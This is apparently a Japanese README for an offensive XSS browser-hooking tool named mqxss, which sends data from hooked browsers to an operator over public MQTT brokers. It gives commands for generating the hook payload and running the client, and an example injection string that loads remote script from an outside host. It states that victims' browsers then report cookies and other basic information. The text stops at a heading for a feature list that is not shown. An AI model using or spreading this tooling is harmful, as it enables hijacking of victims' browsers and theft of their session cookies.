
MQTTを介したフック済みブラウザ通信

beefやxsshunterよりもこれを使う利点は、jsペイロードをホストする以外にインフラのセットアップが不要なことです。パブリックブローカーを使用できます(ただし、現在は難読化を使用しており、暗号化は開発中です)。
フックされたブラウザは、指定したブローカーのMQTTトピックで通信します。これをテストするためのパブリック/フリーブローカーが多数あります。
クライアントはPythonのpaho.mqttライブラリを利用し、jsペイロードは'https://cdnjs.cloudflare.com/ajax/libs/paho-mqtt/1.0.1/mqttws31.min.js'から取得する'mqttws31.min.js'を利用します。

ブラウザをフックするためのJSペイロードを生成するには、実行時に-gフラグをブローカー、ポート、トピック変数とともに設定します。これにより、/js/フォルダ内にペイロードが作成されます。
クライアントを実行するには、ブローカー、ポート、トピックを次のように指定します。
mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname
認証情報を指定してクライアントを実行するには、ブローカー、ポート、ユーザー名、パスワード、トピックを次のように指定します。
mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname -u username -pw password
mqxssクライアントの実行中に、被害者へXSSペイロードを送信します。例: '"><script src=https://example.com/x.js async></script> など。脆弱な場合、ブラウザが接続され、Cookieなどの基本情報を含む通知が表示されます。

機能: